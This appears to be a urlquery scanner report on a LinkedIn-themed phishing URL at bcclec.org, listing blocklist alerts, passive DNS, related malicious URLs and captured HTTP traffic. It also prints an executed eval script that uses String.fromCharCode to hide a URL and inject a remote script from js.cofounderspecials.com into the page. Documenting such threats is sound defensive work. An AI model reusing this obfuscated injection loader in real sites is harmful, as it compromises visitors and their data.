Overview

URL https://bcclec.org/bnnmmnk/dswaer/900/
IP72.167.40.83
ASNGO-DADDY-COM-LLC
Location United States
Report completed2022-07-06 23:50:51 UTC
StatusLoading report..
urlquery Alerts Phishing website detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Added / Verified Severity Host Comment
2022-07-06 2 bcclec.org/bnnmmnk/dswaer/900/ LinkedIn Corporation
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2022-07-06 2 bcclec.org/bnnmmnk/dswaer/900/ Phishing
2022-07-06 2 bcclec.org/bnnmmnk/dswaer/900/js/jquery-3.2.1.slim.min.js Phishing
2022-07-06 2 bcclec.org/bnnmmnk/dswaer/900/images/lin.ico Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (9)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
[Mnemonic Passive DNS] firefox.settings.services.mozilla.com (1) 867 2016-03-17 08:25:01 UTC 2020-05-25 20:01:47 UTC 54.230.111.65
[Mnemonic Passive DNS] contile.services.mozilla.com (1) 1114 No data No data 34.117.237.239
[Mnemonic Passive DNS] ocsp.digicert.com (1) 86 2012-11-29 12:49:49 UTC 2022-07-06 19:05:02 UTC 93.184.220.29
[Mnemonic Passive DNS] js.cofounderspecials.com (2) 0 No data No data 101.99.95.147 Unknown ranking
[Mnemonic Passive DNS] img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-07-06 17:02:11 UTC 34.120.237.76
[Mnemonic Passive DNS] r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-07-06 04:41:34 UTC 23.36.76.226
[Mnemonic Passive DNS] content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-07-06 04:55:23 UTC 54.230.111.7
[Mnemonic Passive DNS] maxcdn.bootstrapcdn.com (2) 724 2017-01-30 05:00:47 UTC 2021-03-05 11:52:46 UTC 104.18.10.207
[Mnemonic Passive DNS] bcclec.org (7) 0 2021-07-20 20:11:26 UTC 2022-05-12 01:12:31 UTC 72.167.40.83 Unknown ranking


Recent reports on same IP/ASN/Domain

Last 5 reports on IP: 72.167.40.83

Date UQ / IDS / BL URL IP
2022-07-12 16:23:30 +0000
0 - 0 - 12 bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-09 08:33:51 +0000
2 - 0 - 6 https://bcclec.org/gfdewdsseqw/12321/900/ 72.167.40.83
2022-07-06 19:40:51 +0000
3 - 0 - 4 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-06 16:44:37 +0000
2 - 0 - 2 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-06 13:50:40 +0000
2 - 0 - 0 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83

Last 10 reports on ASN: GO-DADDY-COM-LLC

Date UQ / IDS / BL URL IP
2022-08-09 09:58:41 +0000
0 - 0 - 3 atelierkikala.com/Facebook/zWUe7fBXDJ/ 216.70.89.121
2022-08-09 09:15:59 +0000
0 - 0 - 3 yukiartusa.com/xhm/olivia.smith-30.zip 160.153.92.9
2022-08-09 08:38:14 +0000
0 - 0 - 2 prosqueezings.com/ 192.169.148.77
2022-08-09 08:09:50 +0000
9 - 0 - 9 elitechairlifts.com/secur06c/auth.php?md=Xnlj (...) 132.148.244.203
2022-08-09 07:33:07 +0000
0 - 0 - 1 catholichub.tv/apps/images/no/eed35ee97c86288 (...) 192.169.140.113
2022-08-09 07:15:14 +0000
0 - 0 - 14 backlinksminer.com/dolor-omnis/voluptas.zip 92.204.129.112
2022-08-09 07:13:37 +0000
0 - 0 - 14 backlinksminer.com/dolor-omnis/molestiae.zip 92.204.129.112
2022-08-09 07:13:18 +0000
3 - 0 - 6 constitutioncamp.org/qjtnlavvb&mbrurkcvfmsnu& (...) 160.153.63.169
2022-08-09 07:07:55 +0000
0 - 0 - 14 backlinksminer.com/dolor-omnis/sint.zip 92.204.129.112
2022-08-09 07:07:28 +0000
0 - 0 - 12 backlinksminer.com/dolor-omnis/iusto.zip 92.204.129.112

Last 5 reports on domain: bcclec.org

Date UQ / IDS / BL URL IP
2022-07-12 16:23:30 +0000
0 - 0 - 12 bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-09 08:33:51 +0000
2 - 0 - 6 https://bcclec.org/gfdewdsseqw/12321/900/ 72.167.40.83
2022-07-06 19:40:51 +0000
3 - 0 - 4 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-06 16:44:37 +0000
2 - 0 - 2 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83
2022-07-06 13:50:40 +0000
2 - 0 - 0 https://bcclec.org/bnnmmnk/dswaer/900/ 72.167.40.83


JavaScript

Executed Scripts (9)


Executed Evals (1)

#1 JavaScript::Eval (size: 665, repeated: 1) - SHA256: 428d6a7606b3011b0d435def1a6e8f4d67dbd6b6ce2935d7c223eaed7cb5376b

                                        var scripts = document.getElementsByTagName("script");
var wantme = false;
for (var i = 0; i < scripts.length; i++) {
    if (scripts[i].id) {
        if (scripts[i].id == "trackmyposs") {
            wantme = true;
        }
    }
}
if (wantme == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "trackmyposs";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 46, 99, 111, 102, 111, 117, 110, 100, 101, 114, 115, 112, 101, 99, 105, 97, 108, 115, 46, 99, 111, 109, 47, 115, 112, 108, 97, 115, 104, 46, 106, 115, 63, 118, 61, 53, 46, 53, 46, 57);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
                                    

Executed Writes (0)



HTTP Transactions (27)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.65
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, Backoff, Content-Type, Content-Length, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 06 Jul 2022 22:56:16 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 b2b04ca80b95df6bc86478a1bf96b7cc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: tfXlDPo76Fr7UoJBHLl4gI22pxJ-kxBMqCUtSiSYEPpk1eHzlCIg_A==
Age: 3262


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    91dd975a7b17b2922dd23c0e49314e40
Sha1:   57a2ece1e3cee7c4ebf927f2ba92f52cac395fe2
Sha256: 09966873bbf317f8910c59544cfde2a6d46e8acd2905797cc7c85c6b4d18ea8a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "78A5DCFAF2D93D9C87CFB6DBC56100E9F22965D4500554BA65F71CB7D84DD666"
Last-Modified: Wed, 06 Jul 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11702
Expires: Thu, 07 Jul 2022 03:05:40 GMT
Date: Wed, 06 Jul 2022 23:50:38 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-08-10-12-10-21.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.7
HTTP/2 200 OK
                                        
content-type: binary/octet-stream
content-length: 5348
last-modified: Tue, 21 Jun 2022 12:10:22 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 06 Jul 2022 03:26:46 GMT
etag: "581454acdd98f34fd3fbabd0977ade29"
x-cache: Hit from cloudfront
via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: Kj0gkhKeCvNHlyOIdfxWVkScIJ7FuGfIaPoEXzsSolF7KxKFPahJQQ==
age: 73433
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    581454acdd98f34fd3fbabd0977ade29
Sha1:   d8d86c0b513137aeb85de01cea7b272c35eb6ab4
Sha256: e98f8f33ba5ed59c3cfdf2ae54957ed32652cf0899f3c8db4b5872e3ece1e4eb
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
                                        
server: nginx
date: Wed, 06 Jul 2022 23:50:38 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5815
Cache-Control: max-age=122041
Date: Wed, 06 Jul 2022 23:50:39 GMT
Etag: "62c542d1-1d7"
Expires: Fri, 08 Jul 2022 09:44:40 GMT
Last-Modified: Wed, 06 Jul 2022 08:07:45 GMT
Server: ECS (ska/F70C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.10.207
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 23:50:39 GMT
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
last-modified: Mon, 25 Jan 2021 22:04:04 GMT
cdn-cachedat: 08/04/2021 00:04:37
cdn-edgestorageid: 601
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-proxyver: 1.0
cdn-status: 200
cdn-requestid: 1a094ec5f566140ad8ed25d8ea736316
cdn-cache: HIT
cf-cache-status: HIT
age: 195186
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 726c3e70583ab518-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (48664)
Size:   13858
Md5:    0d2d7262a098f401208e3ddc2b7e9763
Sha1:   59478f4e3bd12a94d163b6af89c1abeef03e40c0
Sha256: a95daa48ae2c19f19c800187f7f166cd2ee9d3cb31a4246db4ae78a812ff1879
                                        
                                            GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.10.207
HTTP/2 200 OK
                                        
date: Wed, 06 Jul 2022 23:50:39 GMT
content-type: text/css; charset=utf-8
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: SE
cdn-edgestorageid: 601, 617
last-modified: Mon, 25 Jan 2021 22:04:04 GMT
cdn-cachedat: 2021-03-10 20:26:24
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cache-control: public, max-age=31919000
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
x-content-type-options: nosniff
cdn-requestid: 0d20bcca68eb2077d7d189b1643148ba
cdn-cache: HIT
cf-cache-status: HIT
age: 6462218
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 726c3e705834b518-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65325)
Size:   22326
Md5:    c3175713067e76256d7af0a22eec54d4
Sha1:   e9f2174a60208bb3c0d1422455423a6d2785f211
Sha256: e5544e75bbdd2569eede374a420309c89b06b212aa6a96526d5ac095da53175a
                                        
                                            GET /bnnmmnk/dswaer/900/js/jquery.min.js HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Wed, 06 Jul 2022 20:19:32 GMT
accept-ranges: bytes
content-length: 88400
content-type: application/javascript
date: Wed, 06 Jul 2022 23:50:39 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32065), with CRLF line terminators
Size:   88400
Md5:    12f4c90ce7870f43b2bd871715ce463d
Sha1:   58e5c3bab681f7ae44fcef946e3719c80aee0c32
Sha256: e6ba251bb33620163c2716681cf18cbf9daf399d8b76fc506748af5bb8ae9b47
                                        
                                            GET /splash.js?v=5.1.5 HTTP/1.1 
Host: js.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 06 Jul 2022 23:50:39 GMT
Last-Modified: Wed, 06 Jul 2022 12:49:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"62c584eb-9e7"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (2535), with no line terminators
Size:   994
Md5:    3a02c55a822e90514163c8132b6fbef7
Sha1:   e9b35a78c2c3be6b583556061a4418bd5a330561
Sha256: 2e90a30c67923e4128173f94d2c0be4a043d8c0cf5c4925e8d37aa35cbb6fc8b
                                        
                                            GET /splash.js?v=5.5.9 HTTP/1.1 
Host: js.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         101.99.95.147
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 06 Jul 2022 23:50:39 GMT
Last-Modified: Wed, 06 Jul 2022 12:49:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"62c584eb-9e7"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (2535), with no line terminators
Size:   994
Md5:    3a02c55a822e90514163c8132b6fbef7
Sha1:   e9b35a78c2c3be6b583556061a4418bd5a330561
Sha256: 2e90a30c67923e4128173f94d2c0be4a043d8c0cf5c4925e8d37aa35cbb6fc8b
                                        
                                            GET /bnnmmnk/dswaer/900/js/jquery-3.1.1.min.js HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Tue, 05 Jul 2022 23:52:51 GMT
accept-ranges: bytes
content-length: 86711
content-type: application/javascript
date: Wed, 06 Jul 2022 23:50:39 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32030), with CRLF line terminators
Size:   86711
Md5:    81ed7a494e1943be2844e95f9770844c
Sha1:   b063d0aa57f0c50d9bfb9895b76a9467155df7f1
Sha256: 70dae469f94f214b589d53521b903830a08b4fb589d47a4c269a83c79116886a
                                        
                                            GET /bnnmmnk/dswaer/900/ HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
content-type: text/html; charset=UTF-8
date: Wed, 06 Jul 2022 23:50:39 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text
Size:   7957
Md5:    24dbf2096662dc76534a68d4bfaa8fb0
Sha1:   c93186c6dd348e85361d188a053835dccebc03b5
Sha256: 02be174fe8083c3aaa7b9e79617dcf71068207e4ba949be93b91533aca996e30

Alerts:
  urlquery:
    - Phishing website detected
  Blocklists:
    - openphish: LinkedIn Corporation
    - fortinet: Phishing
                                        
                                            GET /bnnmmnk/dswaer/900/js/popper.min.js HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Tue, 05 Jul 2022 23:52:51 GMT
accept-ranges: bytes
content-length: 19187
content-type: application/javascript
date: Wed, 06 Jul 2022 23:50:39 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (19015)
Size:   19187
Md5:    124bf4d1a7db31dd60d4642dce268035
Sha1:   d3745247363d9cb016aaef057bbf2a363796cc01
Sha256: 5614d21225b2e012e3765c1b32fba0b8762bcecd8863c8705c1bcc0d03ec19de
                                        
                                            GET /bnnmmnk/dswaer/900/js/jquery-3.2.1.slim.min.js HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Tue, 05 Jul 2022 23:52:51 GMT
accept-ranges: bytes
content-length: 69596
content-type: application/javascript
date: Wed, 06 Jul 2022 23:50:39 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32012)
Size:   69596
Md5:    e4f60e36fb624b3b4dd616ce75a0bf3c
Sha1:   8856754bdf9b102d046b16f91feb203c606b32bd
Sha256: 91a04a5dfe501d54af8a59b942495bd7ab26bb811ab34f460115fc0267f825f1

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /bnnmmnk/dswaer/900/images/bg.png HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Tue, 05 Jul 2022 23:52:51 GMT
accept-ranges: bytes
content-length: 275369
content-type: image/png
date: Wed, 06 Jul 2022 23:50:40 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1440 x 756, 8-bit/color RGBA, non-interlaced\012- data
Size:   275369
Md5:    a2f27d034191ec6eb253cc9c03d84b80
Sha1:   f0ff51e32e44f0bdef03ffc1bf3877b14b8fa7fa
Sha256: f1d47047880941c4d0b93063efaeeeef81ab46845c5cad8c25669a5707d156b4
                                        
                                            GET /bnnmmnk/dswaer/900/images/lin.ico HTTP/1.1 
Host: bcclec.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://bcclec.org/bnnmmnk/dswaer/900/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         72.167.40.83
HTTP/2 200 OK
                                        
last-modified: Tue, 05 Jul 2022 23:52:51 GMT
accept-ranges: bytes
content-length: 32988
content-type: image/x-icon
date: Wed, 06 Jul 2022 23:50:40 GMT
server: Apache
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel\012- data
Size:   32988
Md5:    3d0e5c05903cec0bc8e3fe0cda552745
Sha1:   1b513503c65572f0787a14cc71018bd34f11b661
Sha256: 42a498dc5f62d81801f8e753fc9a50af5bc1aabda8ab8b2960dce48211d7c023

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E96EA592111AAC8DB4D301EA1E1DEF1043D15D8774C4224D707FB21885E98909"
Last-Modified: Wed, 06 Jul 2022 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4726
Expires: Thu, 07 Jul 2022 01:09:27 GMT
Date: Wed, 06 Jul 2022 23:50:41 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E96EA592111AAC8DB4D301EA1E1DEF1043D15D8774C4224D707FB21885E98909"
Last-Modified: Wed, 06 Jul 2022 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4726
Expires: Thu, 07 Jul 2022 01:09:27 GMT
Date: Wed, 06 Jul 2022 23:50:41 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E96EA592111AAC8DB4D301EA1E1DEF1043D15D8774C4224D707FB21885E98909"
Last-Modified: Wed, 06 Jul 2022 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4726
Expires: Thu, 07 Jul 2022 01:09:27 GMT
Date: Wed, 06 Jul 2022 23:50:41 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E96EA592111AAC8DB4D301EA1E1DEF1043D15D8774C4224D707FB21885E98909"
Last-Modified: Wed, 06 Jul 2022 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4726
Expires: Thu, 07 Jul 2022 01:09:27 GMT
Date: Wed, 06 Jul 2022 23:50:41 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E96EA592111AAC8DB4D301EA1E1DEF1043D15D8774C4224D707FB21885E98909"
Last-Modified: Wed, 06 Jul 2022 19:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4726
